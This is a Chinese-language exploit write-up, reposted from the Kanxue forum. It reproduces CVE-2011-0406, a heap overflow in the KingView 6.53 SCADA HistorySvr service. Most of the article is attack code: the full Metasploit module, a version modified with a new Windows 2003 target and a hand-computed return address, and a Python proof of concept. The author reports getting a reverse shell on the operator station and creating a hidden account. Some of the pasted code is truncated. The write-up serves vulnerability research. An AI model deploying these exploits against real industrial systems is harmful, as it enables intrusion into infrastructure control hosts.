2023-12-31 16:47:36 Author: mp.weixin.qq.com(查看原文) 阅读量:1 收藏

WellinTech KingView 6.53 版本中的 HistorySvr.exe 中存在基于堆的缓冲区溢出漏洞。攻击者可借助对 TCP 端口 777 的超长请求执行任意代码,实现在 windows 操作员站上的漏洞利用,但现有metasploit中kingview模块无法利用成功,本文基于此进行了分析研究。


组态王 KingView

亚控科技是国内较早成立的自动化软件企业之一,专注于自主研发、市场营销和服务。1995 年率先推出组态软件 KingView 系列产品,创立组态王品牌,经过近 20 年的快速发展, 目前公司的产品涵盖设备或工段级监控平台、厂级或集团级监控平台、生产实时智能平台, 产品及方案广泛应用于市政、油气、电力、矿山、物流、汽车、大型设备等行业。

设备或工段级监控平台即组态王 KingView 系列产品侧重于对各种设备运行状态、某个 工段或生产线运行情况的监视控制,厂级或集团级监控平台即 KingIOServer、KingSCADA、 KingHistria产品侧重于厂级或集团级生产运营情况的全面监控及管理;生产管理平台即 KingFusion 产品则侧重实现产线监控和生产管理的完美结合。


CVE-2011-0406 所描述的是亚控组态软件 KingView 6.53 存在的一个缓冲区溢出漏洞, 通过反汇编逆向分析结合动态调试可以发现该漏洞的成因,并可构造攻击代码对其所在上位 机进行攻击,进而获得上位机的远程控制权限。

亚控组态软件 KingView 6.53 是运行在 windows 系列操作系统上的组态软件,是亚控 公司推出的一款针对中小型项目推出的用于监视与控制自动化设备和过程的 SCADA 产品, 支持连接 1000 多个厂家近 4000 种设备,支持包括主流 PLC、变频器、仪表、特殊模块、板 卡及电力、楼宇等协议。通过分析发现安装Kingview6.53 软件后,系统会启动 HistorySvr.exe 进程并会以系统服务形式在上位机中运行,该服务会在 TCP 的 777 端口监听接收数据,在 接收到数据后 HistorySvr.exe 程序会有 3 次拷贝操作,前两次各 0x4000 字节,最后一次 0xC 字节,共计 0x800C(32780)字节,在写入缓冲区时,对数据校验不严格导致堆缓冲区溢出 而执行任意代码。通过构造带有 shellcode 的恶意数据包向目标主机的 777 端口进行发送即 可触发该漏洞。

HistorySvr.exe 进程循环接收业务数据(传感器上报数据),当接收到 异常格式的业务数据后进行数据处理时没有对数据长度进行严格校验,导致异常数据会覆盖缓冲区空间,当 CPU 按照指针地址执行指令时会跳转到攻击者设计好的 shellcode地址进行执行,导致执行攻击者构造的攻击代码。在实验过程中可以利用meatasploit攻击框架工具构造攻击代码,主要攻击载荷如下:

sploit< < make_nops(1020)
sploit< < "\xC4\x04\x2B\x01"
sploit< < payload.encoded
sploit< < "x44"* (31752-payload.encoded.length)
sploit< < [target.ret].pack('V')

通过代码可看出数据包前 1020 位使用指令用来占位,接下来 4 位是我们构造的反向连接 shellcode 在内存空间中的地址,后面是加密后的shellcode 代码,然后用(31752-shellcode长度)位的 A 字符来填充补位,最后是用来覆盖 eax 寄存器的跳转地址。

通过缓冲区溢出漏洞可覆盖 eax 寄存器的数据,导致程序执行到 call dword ptr[eax+c] 时指针跳转到 shellcode地址进行执行,在实际测试中可以使用metasploit构造不同类型的shellcode,可以构造反向连接类型 shellcode。使用metasploit进行攻击测试的时候需要设置 3 个参数,RHOST为远程上位机IP 地址,RPORT为 HistorySvr.exe 进程监听端口,payload为攻击载荷shellcode。

设置好攻击目标及端口,并加载好shellcode 后可以使用 run命令进行攻击测试,攻击成功后会获得反向连接的控制权限,并可使用metasploit自带的工具meterpreter在远程机器上执行系统命令进行远程控制。



Windows Server 2003:KingView 6.53
Kali Linux:metasploit、Python等

网卡:Server2003 与Kali桥接为同一网卡



收集 CVE-2011-0406 的信息和 EXP。

# $Id$

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info={})
'Name' => "Kingview 6.53 SCADA HMI HistorySvr Heap Overflow",
'Description' => %q{
This module exploits a buffer overflow in Kingview 6.53. By sending a specially
crafted request to port 777 (HistorySvr.exe), a remote attacker may be able to
gain arbitrary code execution without authentication.
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
'Dillon Beresford', #Found by Dillon
'rick2600', #XP SP3 execution
'References' =>
['CVE', '2011-0406'],
['OSVDB', '70366'],
['Bugtraq', '45727'],
['URL', 'http://www.exploit-db.com/exploits/15957'],
['URL', 'http://www.kb.cert.org/vuls/id/180119'],
['URL', 'http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html'],
'Payload' =>
'BadChars' => "\x00\x0d\x0a\xff"
'Platform' => 'win',
'Targets' =>
[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
'DisclosureDate' => "9/28/2010",
'DefaultTarget' => 0))

register_options( [ Opt::RPORT(777) ], self.class )

def exploit
sploit = ''
if target.name =~ /XP SP1/

sploit << make_nops(32812)
sploit << "\xEB\x10"
sploit << "\x41"*6
sploit << "\xAD\xBB\xC3\x77"
sploit << [target.ret].pack('V')
sploit << make_nops(8)
sploit << payload.encoded
sploit << "\x44"*(1000-payload.encoded.length)
#this makes the app more crashy, need to investigatev
#sploit << make_nops(1000-payload.encoded.length)

elsif target.name =~ /XP SP3/

sploit << make_nops(1024)
sploit << payload.encoded
sploit << "\x44"*(31752-payload.encoded.length)
#rand_text_alpha_xxx() unfortunately makes it a bit unstable,
#not ready to implement
#sploit << rand_text_alpha_upper(32776-sploit.length)
sploit << [target.ret].pack('V')



print_status("Trying target #{target.name}")

select(nil, nil, nil, 5)


将 rb 脚本存放至 metasploit的相应安装目录中进行调用。例如:/exploits/windows/scada。

开启 KingView6.53 打开软件预制 Kingdemo 工程。

确认目标及其 777 端口已经开放,并且防火墙是关闭状态。


开启 Kali 安全测试主机作为攻击测试主机,确认msf框架 exploit 攻击代码录入并保存在/usr/share/metasploit-framework/modules/expolits/windows/scada 目录下。


查看攻击靶机ip地址,置入 RHOST 参数中。进行攻击尝试。

由于攻击代码中并没有包含 windows Server 2003 版本,因此攻击未成功。



这表明 HistorySvr.exe 程序中的漏洞已经被触发且产生影响,只是 shellcode 并未在目标靶机中运行,程序执行未跳转到指定 shellcode 位置。

通过查看 OllyDbg 中 view—>log,可以看到程序终止在地址为 0x77F47530,异常原因 为 Access violation when reading [00B5084D]。

观察程序发生异常时执行代码为mov cl, byte ptr [eax + 5],即程序将执行该指针位置处的指令,然而该地址值为 0x00B5084D,并未获取到可执行指令。

利用代码针对目标为“windows XP SP3 EN”系统的返回地址 Ret 为异常时 EAX 寄存器 的值 0x00B50848。


重新打开漏洞利用代码进行编辑,targets 中加入“windows 2003 SP0 EN”,target.name 加入“2003 SP0”,Ret 值暂时随意填写,exploit 函数构造溢出包时,加入定位字符“ABCA” 便于我们定位 payload 地址位置,具体代码如下所示。

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info={})
'Name' => "Kingview 6.53 SCADA HMI HistorySvr Heap Overflow",
'Description' => %q{
This module exploits a buffer overflow in Kingview 6.53. By sending a specially
crafted request to port 777 (HistorySvr.exe), a remote attacker may be able to
gain arbitrary code execution without authentication.
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
'Dillon Beresford', #Found by Dillon
'rick2600', #XP SP3 execution
'References' =>
['CVE', '2011-0406'],
['OSVDB', '70366'],
['Bugtraq', '45727'],
['URL', 'http://www.exploit-db.com/exploits/15957'],
['URL', 'http://www.kb.cert.org/vuls/id/180119'],
['URL', 'http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html'],
'Payload' =>
'BadChars' => "\x00\x0d\x0a\xff"
'Platform' => 'win',
'Targets' =>
[ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
[ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
[ 'Windows 2003 SP0 EN', {'Ret' => 0x00B50848} ],#newtarget
'DisclosureDate' => "9/28/2010",
'DefaultTarget' => 0))

register_options( [ Opt::RPORT(777) ], self.class )

def exploit
sploit = ''
if target.name =~ /XP SP1/

sploit << make_nops(32812)
sploit << "\xEB\x10"
sploit << "\x41"*6
sploit << "\xAD\xBB\xC3\x77"
sploit << [target.ret].pack('V')
sploit << make_nops(8)
sploit << payload.encoded
sploit << "\x44"*(1000-payload.encoded.length)
#this makes the app more crashy, need to investigatev
#sploit << make_nops(1000-payload.encoded.length)

elsif target.name =~ /XP SP3/

sploit << make_nops(1024)
sploit << payload.encoded
sploit << "\x44"*(31752-payload.encoded.length)
#rand_text_alpha_xxx() unfortunately makes it a bit unstable,
#not ready to implement
#sploit << rand_text_alpha_upper(32776-sploit.length)
sploit << [target.ret].pack('V')
elsif target.name =~ /2003 SP0/

sploit << make_nops(1020)
sploit << "ABCA"
sploit << payload.encoded
sploit << "\x44"*(31752-payload.encoded.length)
sploit << [target.ret].pack('V')



print_status("Trying target #{target.name}")

select(nil, nil, nil, 5)


进入msf,重新 reaload module,可以看到新加入的目标代码已经加载。


set target 2

再次攻击后,在memory中查找定位字符串位置 ABCA,如下图所示。(图中为我第一次设置的标志值ABCD,方法相同)

可以看到“ABCA”字符串在地址 0x00CD04C0 位置,并且Payload需要在此基础上加4个字节,其实位置在 0x00CD04C4。

需根据上步骤定位出的 shellcode 位置来调整 Ret 的值,使得 eax + 0xC 指向输入数据包中的某个 4 字节数据。定位字符“ABCA”位 置是 0x00CD04C0,减去 0xC 得到 eax 寄存器的值为 0x00CD04C4,所以 Ret 的值为 0x00CD04C4。修改后的利用程序代码如下所示:

elsif target.name =~ /2003 SP0/

sploit << make_nops(1020)
sploit << "\xC4\x04\xB4\x00"
sploit << payload.encoded
sploit << "\x44"*(31752-payload.encoded.length)
sploit << [target.ret].pack('V')




成功获取win 2003 操作员站的shell,并可以在操作员站建立隐蔽账号。


尝试通过Python脚本的方式进行 EXP 编写进行手工测试。


## Exploit Title: KingView 6.53 SCADA HMI Heap Overflow PoC
## Date: 9/28/2010
## Author: Dillon Beresford
## Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
## Version: 6.53 (English)
## Tested on: Windows XP SP1 ( works on SP2 and SP3 ) will release new targets after CERT advisory is public.

## Shouts to HD Moore JDuck, Egyp7, todb, |)ruid, nate and the rest of the AHA! crew.
## Thanks to all who share knowledge about heap smashing and heap bypass techniques.

## Notified CERT and the vendor, CERT notified the vendor as well, vendor never responded.
## No patch or response from vendor as of 1/9/2011
## Lets get this into the wild and see how long it takes them to respond.

## Looks like persistence pays off. :-)

## SP2/SP3 targets will be available soon. (putting into metasploit this is just a poc to get response from vendor).
## Vendor: Beijing WellinControl Technology Development Co.,Ltd
## http://www.wellintek.com

## Beijing WellinControl Technology Development and CHINA CERT were notified on Tue, Sep 28, 2010 at 6:31 AM
## I have made every attempt and yet they choose to ignore...
## This PoC should wake up the dragon. >:-]
## With more to come!

## KingView software is a high-pormance production which can be used to building a data information
## service platform in automatic field. KingView software can provid graphic visualization which takes
## your operations management, control and optimization . KingView is widely used in power,
## water conservancy,buildings, coalmine, environmental protection, metallurgy and so on.
## And now KingView software is used in national defense, Aero-Space in China.

## Notes: The HistorySrv process listens on TCP port 777
## This process does not require any authentication from clients

## An attacker could replace the Flink and Blink pointers with evil ones.. Herrow srweeping dragon.

## Windows XP SP1 (x86)
## CommandLine: "C:\Program Files\Kingview\HistorySvr.exe"
## eax=00241eb4 ebx=7ffdf000 ecx=00000003 edx=77f6eb08 esi=00241eb4 edi=00241f48
## eip=77f767cd esp=0012fb38 ebp=0012fc2c iopl=0 nv up ei pl nz na po nc
## cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
## ntdll!DbgBreakPoint:
## 77f767cd cc int 3
## 0:000> g
## ModLoad: 71950000 71a34000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805\comctl32.dll
## ModLoad: 5ad70000 5ada4000 C:\WINDOWS\System32\uxtheme.dll
## ModLoad: 71a50000 71a8b000 C:\WINDOWS\system32\mswsock.dll
## ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll
## (318.6d4): Access violation - code c0000005 (first chance)
## First chance exceptions are reported before any exception handling.
## This exception may be expected and handled.
## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000
## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0 nv up ei pl zr na pe nc
## cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901 mov dword ptr [ecx],eax ds:0023:44444444=????????
## 0:000> u
## ntdll!RtlAllocateHeapSlowly+0x6bd:
## 77f6256f 8901 mov dword ptr [ecx],eax
## 77f62571 894804 mov dword ptr [eax+4],ecx
## 77f62574 3bc1 cmp eax,ecx
## 77f62576 7534 jne ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62578 668b06 mov ax,word ptr [esi]
## 77f6257b 663d8000 cmp ax,80h
## 77f6257f 732b jae ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac)
## 77f62581 0fb7c8 movzx ecx,ax

## usage python exploit.py 777

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: D1N | twitter.com/D1N "

shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14") # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += shellcode

print " [+] Herrow Sweeping Dragon..."
print " [+] Sending payload..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data = s.recv(1024)

print " [+] Closing connection.."
print " [+] Done!"



*本文为看雪论坛优秀文章,由 FSTARK 原创,转载请注明来自看雪社区

# 往期推荐





5、2022QWB final RDP

6、华为杯研究生国赛 adv_lua




文章来源: https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458532892&idx=1&sn=0eeb5c681a2cd19c8ab5ac619ed7de0f&chksm=b18d0c9686fa8580692d7a929c1633587a713bc5b613007986415aaeefff9597c3a98c5af15d&scene=58&subscene=0#rd